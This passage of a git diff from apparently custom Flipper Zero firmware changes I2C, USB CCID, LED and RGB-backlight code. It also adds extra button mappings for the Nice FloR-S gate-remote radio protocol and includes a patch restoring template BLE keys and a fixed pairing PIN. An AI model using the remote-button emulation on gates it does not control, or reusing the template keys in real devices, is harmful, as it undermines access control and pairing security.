size_t size, + FuriHalI2cBegin begin, + FuriHalI2cEnd end, + uint32_t timeout); + +/** Perform I2C TX and RX transfers + * + * @param handle Pointer to FuriHalI2cBusHandle instance + * @param address I2C slave address + * @param tx_data Pointer to TX data buffer + * @param tx_size Size of TX data buffer + * @param rx_data Pointer to RX data buffer + * @param rx_size Size of RX data buffer + * @param timeout Timeout in milliseconds * * @return true on successful transfer, false otherwise */ bool furi_hal_i2c_trx( FuriHalI2cBusHandle* handle, - const uint8_t address, + uint8_t address, const uint8_t* tx_data, - const uint8_t tx_size, + size_t tx_size, uint8_t* rx_data, - const uint8_t rx_size, + size_t rx_size, uint32_t timeout); /** Check if I2C device presents on bus * - * @param handle pointer to FuriHalI2cBusHandle instance - * @param i2c_addr I2C slave address - * @param timeout timeout in ticks + * @param handle Pointer to FuriHalI2cBusHandle instance + * @param i2c_addr I2C slave address + * @param timeout Timeout in milliseconds * * @return true if device present and is ready, false otherwise */ @@ -101,11 +178,11 @@ bool furi_hal_i2c_is_device_ready(FuriHalI2cBusHandle* handle, uint8_t i2c_addr, /** Perform I2C device register read (8-bit) * - * @param handle pointer to FuriHalI2cBusHandle instance - * @param i2c_addr I2C slave address - * @param reg_addr register address - * @param data pointer to register value - * @param timeout timeout in ticks + * @param handle Pointer to FuriHalI2cBusHandle instance + * @param i2c_addr I2C slave address + * @param reg_addr Register address + * @param data Pointer to register value + * @param timeout Timeout in milliseconds * * @return true on successful transfer, false otherwise */ @@ -118,11 +195,11 @@ bool furi_hal_i2c_read_reg_8( /** Perform I2C device register read (16-bit) * - * @param handle pointer to FuriHalI2cBusHandle instance - * @param i2c_addr I2C slave address - * @param reg_addr register address - * @param data pointer to register value - * @param timeout timeout in ticks + * @param handle Pointer to FuriHalI2cBusHandle instance + * @param i2c_addr I2C slave address + * @param reg_addr Register address + * @param data Pointer to register value + * @param timeout Timeout in milliseconds * * @return true on successful transfer, false otherwise */ @@ -135,12 +212,12 @@ bool furi_hal_i2c_read_reg_16( /** Perform I2C device memory read * - * @param handle pointer to FuriHalI2cBusHandle instance - * @param i2c_addr I2C slave address - * @param mem_addr memory start address - * @param data pointer to data buffer - * @param len size of data buffer - * @param timeout timeout in ticks + * @param handle Pointer to FuriHalI2cBusHandle instance + * @param i2c_addr I2C slave address + * @param mem_addr Memory start address + * @param data Pointer to data buffer + * @param len Size of data buffer + * @param timeout Timeout in milliseconds * * @return true on successful transfer, false otherwise */ @@ -149,16 +226,16 @@ bool furi_hal_i2c_read_mem( uint8_t i2c_addr, uint8_t mem_addr, uint8_t* data, - uint8_t len, + size_t len, uint32_t timeout); /** Perform I2C device register write (8-bit) * - * @param handle pointer to FuriHalI2cBusHandle instance - * @param i2c_addr I2C slave address - * @param reg_addr register address - * @param data register value - * @param timeout timeout in ticks + * @param handle Pointer to FuriHalI2cBusHandle instance + * @param i2c_addr I2C slave address + * @param reg_addr Register address + * @param data Register value + * @param timeout Timeout in milliseconds * * @return true on successful transfer, false otherwise */ @@ -171,11 +248,11 @@ bool furi_hal_i2c_write_reg_8( /** Perform I2C device register write (16-bit) * - * @param handle pointer to FuriHalI2cBusHandle instance - * @param i2c_addr I2C slave address - * @param reg_addr register address - * @param data register value - * @param timeout timeout in ticks + * @param handle Pointer to FuriHalI2cBusHandle instance + * @param i2c_addr I2C slave address + * @param reg_addr Register address + * @param data Register value + * @param timeout Timeout in milliseconds * * @return true on successful transfer, false otherwise */ @@ -188,12 +265,12 @@ bool furi_hal_i2c_write_reg_16( /** Perform I2C device memory * - * @param handle pointer to FuriHalI2cBusHandle instance - * @param i2c_addr I2C slave address - * @param mem_addr memory start address - * @param data pointer to data buffer - * @param len size of data buffer - * @param timeout timeout in ticks + * @param handle Pointer to FuriHalI2cBusHandle instance + * @param i2c_addr I2C slave address + * @param mem_addr Memory start address + * @param data Pointer to data buffer + * @param len Size of data buffer + * @param timeout Timeout in milliseconds * * @return true on successful transfer, false otherwise */ @@ -201,8 +278,8 @@ bool furi_hal_i2c_write_mem( FuriHalI2cBusHandle* handle, uint8_t i2c_addr, uint8_t mem_addr, - uint8_t* data, - uint8_t len, + const uint8_t* data, + size_t len, uint32_t timeout); #ifdef __cplusplus diff --git a/firmware/targets/furi_hal_include/furi_hal_usb.h b/firmware/targets/furi_hal_include/furi_hal_usb.h index 2affb3d6d..85a3fb89e 100644 --- a/firmware/targets/furi_hal_include/furi_hal_usb.h +++ b/firmware/targets/furi_hal_include/furi_hal_usb.h @@ -28,6 +28,7 @@ extern FuriHalUsbInterface usb_cdc_single; extern FuriHalUsbInterface usb_cdc_dual; extern FuriHalUsbInterface usb_hid; extern FuriHalUsbInterface usb_hid_u2f; +extern FuriHalUsbInterface usb_ccid; typedef enum { FuriHalUsbStateEventReset, diff --git a/firmware/targets/furi_hal_include/furi_hal_usb_ccid.h b/firmware/targets/furi_hal_include/furi_hal_usb_ccid.h new file mode 100644 index 000000000..e3ee0dfc3 --- /dev/null +++ b/firmware/targets/furi_hal_include/furi_hal_usb_ccid.h @@ -0,0 +1,31 @@ +#pragma once +#include "hid_usage_desktop.h" +#include "hid_usage_button.h" +#include "hid_usage_keyboard.h" +#include "hid_usage_consumer.h" +#include "hid_usage_led.h" + +#ifdef __cplusplus +extern "C" { +#endif + +typedef struct { + uint16_t vid; + uint16_t pid; + char manuf[32]; + char product[32]; +} FuriHalUsbCcidConfig; + +typedef struct { + void (*icc_power_on_callback)(uint8_t* dataBlock, uint32_t* dataBlockLen, void* context); + void (*xfr_datablock_callback)(uint8_t* dataBlock, uint32_t* dataBlockLen, void* context); +} CcidCallbacks; + +void furi_hal_ccid_set_callbacks(CcidCallbacks* cb); + +void furi_hal_ccid_ccid_insert_smartcard(); +void furi_hal_ccid_ccid_remove_smartcard(); + +#ifdef __cplusplus +} +#endif diff --git a/lib/drivers/SK6805.c b/lib/drivers/SK6805.c index e64ecba32..824c21009 100644 --- a/lib/drivers/SK6805.c +++ b/lib/drivers/SK6805.c @@ -39,25 +39,26 @@ static const GpioPin led_pin = {.port = GPIOA, .pin = LL_GPIO_PIN_8}; static uint8_t led_buffer[SK6805_LED_COUNT][3]; -void SK6805_init(void) { +void SK6805_init() { DEBUG_INIT(); furi_hal_gpio_write(SK6805_LED_PIN, false); furi_hal_gpio_init(SK6805_LED_PIN, GpioModeOutputPushPull, GpioPullNo, GpioSpeedVeryHigh); } -uint8_t SK6805_get_led_count(void) { +uint8_t SK6805_get_led_count() { return (const uint8_t)SK6805_LED_COUNT; } void SK6805_set_led_color(uint8_t led_index, uint8_t r, uint8_t g, uint8_t b) { + FURI_LOG_T(TAG, "led: %d, r: %d, g: %d, b: %d", led_index, r, g, b); furi_check(led_index < SK6805_LED_COUNT); led_buffer[led_index][0] = g; led_buffer[led_index][1] = r; led_buffer[led_index][2] = b; - FURI_LOG_T(TAG, "led: %d, r: %d, g: %d, b: %d", led_index, r, g, b); } -void SK6805_update(void) { +void SK6805_update() { + FURI_LOG_T(TAG, "update"); SK6805_init(); furi_kernel_lock(); uint32_t end; diff --git a/lib/drivers/SK6805.h b/lib/drivers/SK6805.h index ed0dcdb36..4cbe0072f 100644 --- a/lib/drivers/SK6805.h +++ b/lib/drivers/SK6805.h @@ -26,14 +26,14 @@ /** * @brief Инициализация линии управления подсветкой */ -void SK6805_init(void); +void SK6805_init(); /** * @brief Получить количество светодиодов в подсветке * * @return Количество светодиодов */ -uint8_t SK6805_get_led_count(void); +uint8_t SK6805_get_led_count(); /** * @brief Установить цвет свечения светодиода @@ -48,6 +48,6 @@ void SK6805_set_led_color(uint8_t led_index, uint8_t r, uint8_t g, uint8_t b); /** * @brief Обновление состояния подсветки дисплея */ -void SK6805_update(void); +void SK6805_update(); #endif /* SK6805_H_ */ diff --git a/lib/drivers/rgb_backlight.c b/lib/drivers/rgb_backlight.c index 5a19ce0ca..8c6d77bad 100644 --- a/lib/drivers/rgb_backlight.c +++ b/lib/drivers/rgb_backlight.c @@ -47,58 +47,27 @@ static struct { static struct { bool settings_loaded; + FuriMutex* mutex; bool enabled; - bool last_rainbow; uint8_t last_brightness; - RgbColor last_colors[SK6805_LED_COUNT]; FuriTimer* rainbow_timer; HsvColor rainbow_hsv; } rgb_state = { .settings_loaded = false, + .mutex = NULL, .enabled = false, - .last_rainbow = true, .last_brightness = 0, - .last_colors = - { - {0, 0, 0}, - {0, 0, 0}, - {0, 0, 0}, - }, .rainbow_timer = NULL, .rainbow_hsv = {0, 255, 255}, }; -static void rainbow_timer(void* ctx) { - UNUSED(ctx); - rgb_backlight_update(rgb_state.last_brightness, true); -} - -void rgb_backlight_reconfigure(bool enabled) { - if(enabled && !rgb_state.settings_loaded) { - rgb_backlight_load_settings(); - } +void rgb_backlight_load_settings(bool enabled) { + if(rgb_state.settings_loaded) return; rgb_state.enabled = enabled; + rgb_state.mutex = furi_mutex_alloc(FuriMutexTypeRecursive); - if(rgb_state.enabled && rgb_settings.rainbow_mode != RGBBacklightRainbowModeOff) { - if(rgb_state.rainbow_timer == NULL) { - rgb_state.rainbow_timer = furi_timer_alloc(rainbow_timer, FuriTimerTypePeriodic, NULL); - } else { - furi_timer_stop(rgb_state.rainbow_timer); - } - furi_timer_start(rgb_state.rainbow_timer, rgb_settings.rainbow_interval); - } else if(rgb_state.rainbow_timer != NULL) { - furi_timer_stop(rgb_state.rainbow_timer); - furi_timer_free(rgb_state.rainbow_timer); - rgb_state.rainbow_timer = NULL; - } - rgb_state.rainbow_hsv.s = rgb_settings.rainbow_saturation; - - rgb_backlight_update(rgb_state.last_brightness, false); -} - -void rgb_backlight_load_settings(void) { // Do not load data from internal memory when booting in DFU mode - if(!furi_hal_is_normal_boot() || rgb_state.settings_loaded) { + if(!furi_hal_is_normal_boot()) { rgb_state.settings_loaded = true; return; } @@ -114,108 +83,166 @@ void rgb_backlight_load_settings(void) { rgb_backlight_reconfigure(rgb_state.enabled); } -void rgb_backlight_save_settings(void) { +void rgb_backlight_save_settings() { + if(!rgb_state.settings_loaded) return; + furi_check(furi_mutex_acquire(rgb_state.mutex, FuriWaitForever) == FuriStatusOk); + saved_struct_save( RGB_BACKLIGHT_SETTINGS_PATH, &rgb_settings, sizeof(rgb_settings), RGB_BACKLIGHT_SETTINGS_MAGIC, RGB_BACKLIGHT_SETTINGS_VERSION); + + furi_check(furi_mutex_release(rgb_state.mutex) == FuriStatusOk); } void rgb_backlight_set_color(uint8_t index, RgbColor color) { if(index >= COUNT_OF(rgb_settings.colors)) return; - if(!rgb_state.settings_loaded) { - rgb_backlight_load_settings(); - } + + if(!rgb_state.settings_loaded) return; + furi_check(furi_mutex_acquire(rgb_state.mutex, FuriWaitForever) == FuriStatusOk); + rgb_settings.colors[index] = color; rgb_backlight_reconfigure(rgb_state.enabled); + + furi_check(furi_mutex_release(rgb_state.mutex) == FuriStatusOk); } RgbColor rgb_backlight_get_color(uint8_t index) { if(index >= COUNT_OF(rgb_settings.colors)) return (RgbColor){0, 0, 0}; - if(!rgb_state.settings_loaded) { - rgb_backlight_load_settings(); - } - return rgb_settings.colors[index]; + + if(!rgb_state.settings_loaded) return (RgbColor){0, 0, 0}; + furi_check(furi_mutex_acquire(rgb_state.mutex, FuriWaitForever) == FuriStatusOk); + + RgbColor color = rgb_settings.colors[index]; + + furi_check(furi_mutex_release(rgb_state.mutex) == FuriStatusOk); + return color; } void rgb_backlight_set_rainbow_mode(RGBBacklightRainbowMode rainbow_mode) { if(rainbow_mode >= RGBBacklightRainbowModeCount) return; - if(!rgb_state.settings_loaded) { - rgb_backlight_load_settings(); - } + + if(!rgb_state.settings_loaded) return; + furi_check(furi_mutex_acquire(rgb_state.mutex, FuriWaitForever) == FuriStatusOk); + rgb_settings.rainbow_mode = rainbow_mode; rgb_backlight_reconfigure(rgb_state.enabled); + + furi_check(furi_mutex_release(rgb_state.mutex) == FuriStatusOk); } RGBBacklightRainbowMode rgb_backlight_get_rainbow_mode() { - if(!rgb_state.settings_loaded) { - rgb_backlight_load_settings(); - } - return rgb_settings.rainbow_mode; + if(!rgb_state.settings_loaded) return 0; + furi_check(furi_mutex_acquire(rgb_state.mutex, FuriWaitForever) == FuriStatusOk); + + RGBBacklightRainbowMode rainbow_mode = rgb_settings.rainbow_mode; + + furi_check(furi_mutex_release(rgb_state.mutex) == FuriStatusOk); + return rainbow_mode; } void rgb_backlight_set_rainbow_speed(uint8_t rainbow_speed) { - if(!rgb_state.settings_loaded) { - rgb_backlight_load_settings(); - } + if(!rgb_state.settings_loaded) return; + furi_check(furi_mutex_acquire(rgb_state.mutex, FuriWaitForever) == FuriStatusOk); + rgb_settings.rainbow_speed = rainbow_speed; + + furi_check(furi_mutex_release(rgb_state.mutex) == FuriStatusOk); } uint8_t rgb_backlight_get_rainbow_speed() { - if(!rgb_state.settings_loaded) { - rgb_backlight_load_settings(); - } - return rgb_settings.rainbow_speed; + if(!rgb_state.settings_loaded) return 0; + furi_check(furi_mutex_acquire(rgb_state.mutex, FuriWaitForever) == FuriStatusOk); + + uint8_t rainbow_speed = rgb_settings.rainbow_speed; + + furi_check(furi_mutex_release(rgb_state.mutex) == FuriStatusOk); + return rainbow_speed; } void rgb_backlight_set_rainbow_interval(uint32_t rainbow_interval) { if(rainbow_interval < 100) return; - if(!rgb_state.settings_loaded) { - rgb_backlight_load_settings(); - } + + if(!rgb_state.settings_loaded) return; + furi_check(furi_mutex_acquire(rgb_state.mutex, FuriWaitForever) == FuriStatusOk); + rgb_settings.rainbow_interval = rainbow_interval; rgb_backlight_reconfigure(rgb_state.enabled); + + furi_check(furi_mutex_release(rgb_state.mutex) == FuriStatusOk); } uint32_t rgb_backlight_get_rainbow_interval() { - if(!rgb_state.settings_loaded) { - rgb_backlight_load_settings(); - } - return rgb_settings.rainbow_interval; + if(!rgb_state.settings_loaded) return 0; + furi_check(furi_mutex_acquire(rgb_state.mutex, FuriWaitForever) == FuriStatusOk); + + uint32_t rainbow_interval = rgb_settings.rainbow_interval; + + furi_check(furi_mutex_release(rgb_state.mutex) == FuriStatusOk); + return rainbow_interval; } void rgb_backlight_set_rainbow_saturation(uint8_t rainbow_saturation) { - if(!rgb_state.settings_loaded) { - rgb_backlight_load_settings(); - } + if(!rgb_state.settings_loaded) return; + furi_check(furi_mutex_acquire(rgb_state.mutex, FuriWaitForever) == FuriStatusOk); + rgb_settings.rainbow_saturation = rainbow_saturation; rgb_backlight_reconfigure(rgb_state.enabled); + + furi_check(furi_mutex_release(rgb_state.mutex) == FuriStatusOk); } uint8_t rgb_backlight_get_rainbow_saturation() { - if(!rgb_state.settings_loaded) { - rgb_backlight_load_settings(); + if(!rgb_state.settings_loaded) return 0; + furi_check(furi_mutex_acquire(rgb_state.mutex, FuriWaitForever) == FuriStatusOk); + + uint8_t rainbow_saturation = rgb_settings.rainbow_saturation; + + furi_check(furi_mutex_release(rgb_state.mutex) == FuriStatusOk); + return rainbow_saturation; +} + +static void rainbow_timer(void* ctx) { + UNUSED(ctx); + rgb_backlight_update(rgb_state.last_brightness, true); +} + +void rgb_backlight_reconfigure(bool enabled) { + if(!rgb_state.settings_loaded) return; + furi_check(furi_mutex_acquire(rgb_state.mutex, FuriWaitForever) == FuriStatusOk); + + rgb_state.enabled = enabled; + if(rgb_state.enabled && rgb_settings.rainbow_mode != RGBBacklightRainbowModeOff) { + if(rgb_state.rainbow_timer == NULL) { + rgb_state.rainbow_timer = furi_timer_alloc(rainbow_timer, FuriTimerTypePeriodic, NULL); + } else { + furi_timer_stop(rgb_state.rainbow_timer); + } + furi_timer_start(rgb_state.rainbow_timer, rgb_settings.rainbow_interval); + } else if(rgb_state.rainbow_timer != NULL) { + furi_timer_stop(rgb_state.rainbow_timer); + furi_timer_free(rgb_state.rainbow_timer); + rgb_state.rainbow_timer = NULL; } - return rgb_settings.rainbow_saturation; + rgb_state.rainbow_hsv.s = rgb_settings.rainbow_saturation; + rgb_backlight_update(rgb_state.last_brightness, false); + + furi_check(furi_mutex_release(rgb_state.mutex) == FuriStatusOk); } void rgb_backlight_update(uint8_t brightness, bool tick) { - if(!rgb_state.enabled) return; - if(!rgb_state.settings_loaded) { - rgb_backlight_load_settings(); + if(!rgb_state.settings_loaded) return; + furi_check(furi_mutex_acquire(rgb_state.mutex, FuriWaitForever) == FuriStatusOk); + + if(!rgb_state.enabled) { + furi_check(furi_mutex_release(rgb_state.mutex) == FuriStatusOk); + return; } switch(rgb_settings.rainbow_mode) { case RGBBacklightRainbowModeOff: { - if(!rgb_state.last_rainbow && rgb_state.last_brightness == brightness && - memcmp(rgb_state.last_colors, rgb_settings.colors, sizeof(rgb_settings.colors)) == 0) { - return; - } - rgb_state.last_rainbow = false; - memcpy(rgb_state.last_colors, rgb_settings.colors, sizeof(rgb_settings.colors)); - float bright = brightness / 255.0f; for(uint8_t i = 0; i < SK6805_get_led_count(); i++) { SK6805_set_led_color( @@ -229,14 +256,9 @@ void rgb_backlight_update(uint8_t brightness, bool tick) { case RGBBacklightRainbowModeWave: case RGBBacklightRainbowModeSolid: { - rgb_state.last_rainbow = true; - if(tick && brightness) { rgb_state.rainbow_hsv.h += rgb_settings.rainbow_speed; } else { - if(rgb_state.last_brightness == brightness && rgb_state.last_rainbow) { - return; - } rgb_state.rainbow_hsv.v = brightness; } @@ -254,9 +276,12 @@ void rgb_backlight_update(uint8_t brightness, bool tick) { } default: + furi_check(furi_mutex_release(rgb_state.mutex) == FuriStatusOk); return; } rgb_state.last_brightness = brightness; SK6805_update(); + + furi_check(furi_mutex_release(rgb_state.mutex) == FuriStatusOk); } diff --git a/lib/drivers/rgb_backlight.h b/lib/drivers/rgb_backlight.h index b289520fd..f7f008651 100644 --- a/lib/drivers/rgb_backlight.h +++ b/lib/drivers/rgb_backlight.h @@ -33,16 +33,11 @@ typedef enum { } RGBBacklightRainbowMode; /** - * @brief Reconfigure rgb backlight with new settings + * @brief Load backlight settings from SD card. Needs to be run at boot * * @param enabled Whether the rgb backlight is enabled */ -void rgb_backlight_reconfigure(bool enabled); - -/** - * @brief Load backlight settings from SD card - */ -void rgb_backlight_load_settings(); +void rgb_backlight_load_settings(bool enabled); /** * @brief Save Current RGB Lighting Settings @@ -95,6 +90,13 @@ void rgb_backlight_set_rainbow_saturation(uint8_t rainbow_saturation); uint8_t rgb_backlight_get_rainbow_saturation(); +/** + * @brief Reconfigure rgb backlight with new settings + * + * @param enabled Whether the rgb backlight is enabled + */ +void rgb_backlight_reconfigure(bool enabled); + /** * @brief Apply current RGB lighting settings * diff --git a/lib/libusb_stm32 b/lib/libusb_stm32 index 9168e2a31..6ca285751 160000 --- a/lib/libusb_stm32 +++ b/lib/libusb_stm32 @@ -1 +1 @@ -Subproject commit 9168e2a31db946326fb84016a74ea2ab5bf87f54 +Subproject commit 6ca2857519f996244f7b324dd227fdf0a075fffb diff --git a/lib/stm32wb.scons b/lib/stm32wb.scons index 94a1c7075..8a8ad9644 100644 --- a/lib/stm32wb.scons +++ b/lib/stm32wb.scons @@ -64,7 +64,6 @@ sources += [ "stm32wb_copro/wpan/ble/core/auto/ble_l2cap_aci.c", "stm32wb_copro/wpan/ble/core/template/osal.c", "stm32wb_copro/wpan/utilities/dbg_trace.c", - "stm32wb_copro/wpan/utilities/otp.c", "stm32wb_copro/wpan/utilities/stm_list.c", ] diff --git a/lib/stm32wb_copro b/lib/stm32wb_copro index 6c9c54f05..bbccbefae 160000 --- a/lib/stm32wb_copro +++ b/lib/stm32wb_copro @@ -1 +1 @@ -Subproject commit 6c9c54f05669b2c4d436df58bb691d3b0d7c86df +Subproject commit bbccbefae26a2301b8a4b58e57ebdeb93c08269b diff --git a/lib/subghz/protocols/nice_flor_s.c b/lib/subghz/protocols/nice_flor_s.c index 6448378f6..8c4a22858 100644 --- a/lib/subghz/protocols/nice_flor_s.c +++ b/lib/subghz/protocols/nice_flor_s.c @@ -688,7 +688,7 @@ static void subghz_protocol_nice_flor_s_remote_controller( if(subghz_custom_btn_get_original() == 0) { subghz_custom_btn_set_original(instance->btn); } - subghz_custom_btn_set_max(3); + subghz_custom_btn_set_max(4); } uint8_t subghz_protocol_decoder_nice_flor_s_get_hash_data(void* context) { @@ -774,6 +774,9 @@ static uint8_t subghz_protocol_nice_flor_s_get_btn_code() { case 0x8: btn = 0x1; break; + case 0x3: + btn = 0x1; + break; default: break; @@ -792,6 +795,9 @@ static uint8_t subghz_protocol_nice_flor_s_get_btn_code() { case 0x8: btn = 0x4; break; + case 0x3: + btn = 0x4; + break; default: break; @@ -810,6 +816,30 @@ static uint8_t subghz_protocol_nice_flor_s_get_btn_code() { case 0x8: btn = 0x2; break; + case 0x3: + btn = 0x8; + break; + + default: + break; + } + } else if(custom_btn_id == SUBGHZ_CUSTOM_BTN_RIGHT) { + switch(original_btn_code) { + case 0x1: + btn = 0x3; + break; + case 0x2: + btn = 0x3; + break; + case 0x4: + btn = 0x3; + break; + case 0x8: + btn = 0x3; + break; + case 0x3: + btn = 0x2; + break; default: break; diff --git a/lib/xtreme/settings.c b/lib/xtreme/settings.c index 49bf67d0b..af432eb89 100644 --- a/lib/xtreme/settings.c +++ b/lib/xtreme/settings.c @@ -196,7 +196,7 @@ void XTREME_SETTINGS_LOAD() { flipper_format_free(file); furi_record_close(RECORD_STORAGE); - rgb_backlight_reconfigure(x->rgb_backlight); + rgb_backlight_load_settings(x->rgb_backlight); } void XTREME_SETTINGS_SAVE() { diff --git a/revert_hardfault_fix_for_ios_hid.patch b/revert_hardfault_fix_for_ios_hid.patch new file mode 100644 index 000000000..6b904fc58 --- /dev/null +++ b/revert_hardfault_fix_for_ios_hid.patch @@ -0,0 +1,4889 @@ +diff --git a/SConstruct b/SConstruct +index 698ea85ec..8d389b70b 100644 +--- a/SConstruct ++++ b/SConstruct +@@ -77,8 +77,6 @@ if GetOption("fullenv") or any( + "${COPRO_DISCLAIMER}", + "--obdata", + '"${ROOT_DIR.abspath}/${COPRO_OB_DATA}"', +- "--stackversion", +- "${COPRO_CUBE_VERSION}", + ] + dist_resource_arguments = [ + "-r", +diff --git a/applications/services/bt/bt_service/bt.c b/applications/services/bt/bt_service/bt.c +index 31fa54161..d75a88888 100644 +--- a/applications/services/bt/bt_service/bt.c ++++ b/applications/services/bt/bt_service/bt.c +@@ -1,7 +1,7 @@ + #include "bt_i.h" ++#include "battery_service.h" + #include "bt_keys_storage.h" + +-#include + #include + #include + #include +diff --git a/fbt_options.py b/fbt_options.py +index 3f44bec3b..18b636822 100644 +--- a/fbt_options.py ++++ b/fbt_options.py +@@ -25,7 +25,7 @@ DIST_SUFFIX = f"XFW-DEV_@{subprocess.check_output(['git', 'rev-parse', '--short= + COPRO_OB_DATA = "scripts/ob.data" + + # Must match lib/stm32wb_copro version +-COPRO_CUBE_VERSION = "1.17.2" ++COPRO_CUBE_VERSION = "1.15.0" + + COPRO_CUBE_DIR = "lib/stm32wb_copro" + +diff --git a/firmware/targets/f18/api_symbols.csv b/firmware/targets/f18/api_symbols.csv +index 338697ad7..30b63ca3a 100644 +--- a/firmware/targets/f18/api_symbols.csv ++++ b/firmware/targets/f18/api_symbols.csv +@@ -1025,10 +1025,8 @@ Function,+,furi_hal_clock_mco_disable,void, + Function,+,furi_hal_clock_mco_enable,void,"FuriHalClockMcoSourceId, FuriHalClockMcoDivisorId" + Function,-,furi_hal_clock_resume_tick,void, + Function,-,furi_hal_clock_suspend_tick,void, +-Function,-,furi_hal_clock_switch_hse2hsi,void, +-Function,-,furi_hal_clock_switch_hse2pll,_Bool, +-Function,-,furi_hal_clock_switch_hsi2hse,void, +-Function,-,furi_hal_clock_switch_pll2hse,_Bool, ++Function,-,furi_hal_clock_switch_to_hsi,void, ++Function,-,furi_hal_clock_switch_to_pll,void, + Function,+,furi_hal_console_disable,void, + Function,+,furi_hal_console_enable,void, + Function,+,furi_hal_console_init,void, +diff --git a/firmware/targets/f7/api_symbols.csv b/firmware/targets/f7/api_symbols.csv +index 32646daef..01095b832 100644 +--- a/firmware/targets/f7/api_symbols.csv ++++ b/firmware/targets/f7/api_symbols.csv +@@ -1162,10 +1162,8 @@ Function,+,furi_hal_clock_mco_disable,void, + Function,+,furi_hal_clock_mco_enable,void,"FuriHalClockMcoSourceId, FuriHalClockMcoDivisorId" + Function,-,furi_hal_clock_resume_tick,void, + Function,-,furi_hal_clock_suspend_tick,void, +-Function,-,furi_hal_clock_switch_hse2hsi,void, +-Function,-,furi_hal_clock_switch_hse2pll,_Bool, +-Function,-,furi_hal_clock_switch_hsi2hse,void, +-Function,-,furi_hal_clock_switch_pll2hse,_Bool, ++Function,-,furi_hal_clock_switch_to_hsi,void, ++Function,-,furi_hal_clock_switch_to_pll,void, + Function,+,furi_hal_console_disable,void, + Function,+,furi_hal_console_enable,void, + Function,+,furi_hal_console_init,void, +diff --git a/firmware/targets/f7/ble_glue/app_common.h b/firmware/targets/f7/ble_glue/app_common.h +index e969636d2..8eaf23085 100644 +--- a/firmware/targets/f7/ble_glue/app_common.h ++++ b/firmware/targets/f7/ble_glue/app_common.h +@@ -1,4 +1,30 @@ +-#pragma once ++/* USER CODE BEGIN Header */ ++/** ++ ****************************************************************************** ++ * File Name : app_common.h ++ * Description : App Common application configuration file for STM32WPAN Middleware. ++ * ++ ****************************************************************************** ++ * @attention ++ * ++ *

© Copyright (c) 2020 STMicroelectronics. ++ * All rights reserved.

++ * ++ * This software component is licensed by ST under Ultimate Liberty license ++ * SLA0044, the "License"; You may not use this file except in compliance with ++ * the License. You may obtain a copy of the License at: ++ * www.st.com/SLA0044 ++ * ++ ****************************************************************************** ++ */ ++/* USER CODE END Header */ ++/* Define to prevent recursive inclusion -------------------------------------*/ ++#ifndef APP_COMMON_H ++#define APP_COMMON_H ++ ++#ifdef __cplusplus ++extern "C" { ++#endif + + #include + #include +@@ -10,3 +36,5 @@ + #include + + #include "app_conf.h" ++ ++#endif +diff --git a/firmware/targets/f7/ble_glue/app_conf.h b/firmware/targets/f7/ble_glue/app_conf.h +index 25fa688c7..ee5115cfe 100644 +--- a/firmware/targets/f7/ble_glue/app_conf.h ++++ b/firmware/targets/f7/ble_glue/app_conf.h +@@ -1,32 +1,80 @@ + #pragma once + +-#include ++#include "hw_conf.h" ++#include "hw_if.h" ++ ++#include ++#include + + #define CFG_TX_POWER (0x19) /* +0dBm */ + + #define CFG_IDENTITY_ADDRESS GAP_PUBLIC_ADDR + ++/** ++ * Define Advertising parameters ++ */ ++#define CFG_ADV_BD_ADDRESS (0x7257acd87a6c) ++#define CFG_FAST_CONN_ADV_INTERVAL_MIN (0x80) /**< 80ms */ ++#define CFG_FAST_CONN_ADV_INTERVAL_MAX (0xa0) /**< 100ms */ ++#define CFG_LP_CONN_ADV_INTERVAL_MIN (0x640) /**< 1s */ ++#define CFG_LP_CONN_ADV_INTERVAL_MAX (0xfa0) /**< 2.5s */ ++ + /** + * Define IO Authentication + */ +-#define CFG_USED_FIXED_PIN USE_FIXED_PIN_FOR_PAIRING_FORBIDDEN ++#define CFG_BONDING_MODE (1) ++#define CFG_FIXED_PIN (111111) ++#define CFG_USED_FIXED_PIN (1) + #define CFG_ENCRYPTION_KEY_SIZE_MAX (16) + #define CFG_ENCRYPTION_KEY_SIZE_MIN (8) + + /** + * Define IO capabilities + */ +-#define CFG_IO_CAPABILITY IO_CAP_DISPLAY_YES_NO ++#define CFG_IO_CAPABILITY_DISPLAY_ONLY (0x00) ++#define CFG_IO_CAPABILITY_DISPLAY_YES_NO (0x01) ++#define CFG_IO_CAPABILITY_KEYBOARD_ONLY (0x02) ++#define CFG_IO_CAPABILITY_NO_INPUT_NO_OUTPUT (0x03) ++#define CFG_IO_CAPABILITY_KEYBOARD_DISPLAY (0x04) ++ ++#define CFG_IO_CAPABILITY CFG_IO_CAPABILITY_DISPLAY_YES_NO + + /** + * Define MITM modes + */ +-#define CFG_MITM_PROTECTION MITM_PROTECTION_REQUIRED ++#define CFG_MITM_PROTECTION_NOT_REQUIRED (0x00) ++#define CFG_MITM_PROTECTION_REQUIRED (0x01) ++ ++#define CFG_MITM_PROTECTION CFG_MITM_PROTECTION_REQUIRED + + /** + * Define Secure Connections Support + */ +-#define CFG_SC_SUPPORT SC_PAIRING_OPTIONAL ++#define CFG_SECURE_NOT_SUPPORTED (0x00) ++#define CFG_SECURE_OPTIONAL (0x01) ++#define CFG_SECURE_MANDATORY (0x02) ++ ++#define CFG_SC_SUPPORT CFG_SECURE_OPTIONAL ++ ++/** ++ * Define Keypress Notification Support ++ */ ++#define CFG_KEYPRESS_NOT_SUPPORTED (0x00) ++#define CFG_KEYPRESS_SUPPORTED (0x01) ++ ++#define CFG_KEYPRESS_NOTIFICATION_SUPPORT CFG_KEYPRESS_NOT_SUPPORTED ++ ++/** ++ * Numeric Comparison Answers ++ */ ++#define YES (0x01) ++#define NO (0x00) ++ ++/** ++ * Device name configuration for Generic Access Service ++ */ ++#define CFG_GAP_DEVICE_NAME "TEMPLATE" ++#define CFG_GAP_DEVICE_NAME_LENGTH (8) + + /** + * Define PHY +@@ -39,6 +87,42 @@ + #define RX_1M 0x01 + #define RX_2M 0x02 + ++/** ++* Identity root key used to derive LTK and CSRK ++*/ ++#define CFG_BLE_IRK \ ++ { \ ++ 0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, \ ++ 0xf0 \ ++ } ++ ++/** ++* Encryption root key used to derive LTK and CSRK ++*/ ++#define CFG_BLE_ERK \ ++ { \ ++ 0xfe, 0xdc, 0xba, 0x09, 0x87, 0x65, 0x43, 0x21, 0xfe, 0xdc, 0xba, 0x09, 0x87, 0x65, 0x43, \ ++ 0x21 \ ++ } ++ ++/* USER CODE BEGIN Generic_Parameters */ ++/** ++ * SMPS supply ++ * SMPS not used when 